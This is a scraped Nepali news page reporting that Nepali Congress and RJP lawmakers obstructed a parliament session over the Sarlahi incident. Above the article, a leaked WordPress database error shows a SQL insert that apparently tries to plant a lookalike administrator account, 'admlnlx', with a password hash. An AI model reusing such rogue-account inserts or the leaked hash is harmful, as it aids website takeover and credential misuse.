WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bf6yNWstq/wxIQZZC8tvQF08sEJPZU0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 10:26:02', '', 'admlnlx', 'admlnlx')

संसदमा कांग्रेस र राजपाको नाराबाजी, बैठक अवरुद्ध – Gaule Khabar

संसदमा कांग्रेस र राजपाको नाराबाजी, बैठक अवरुद्ध

संसदमा कांग्रेस र राजपाको नाराबाजी, बैठक अवरुद्ध

गाउँले न्युज, १३ साउन, काठमाडौं । प्रमुख प्रतिपक्षी दल नेपाली कांग्रेस र राजपाले संसद बैठक अवरुद्ध गरेका छन् । सर्लाही घटनाबारे छानविन गर्न संसदीय समिति गठनको माग गर्दै उनीहरुले बैठक अवरुद्द पारेका हुन् ।
सोमबारको बैठक सुरु हुनासाथ दुबै दलका सांसदहरु उठेर बिरोधमा उत्रिएका हुन् ।
सभामुखले कार्यसूची अगाडि बढाउने बताएपछि दुबै दलका सांसदहरुले रोष्टम घेराउ गरेका हुन् ।
विपक्षी सांसदहरुले संसदीय सर्वोच्चता कायम गर्न, सर्लाही घटनाको छानविन गर्न संसदीय समिति गठन गर्न माग गर्दै नाराबाजी गरेका छन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका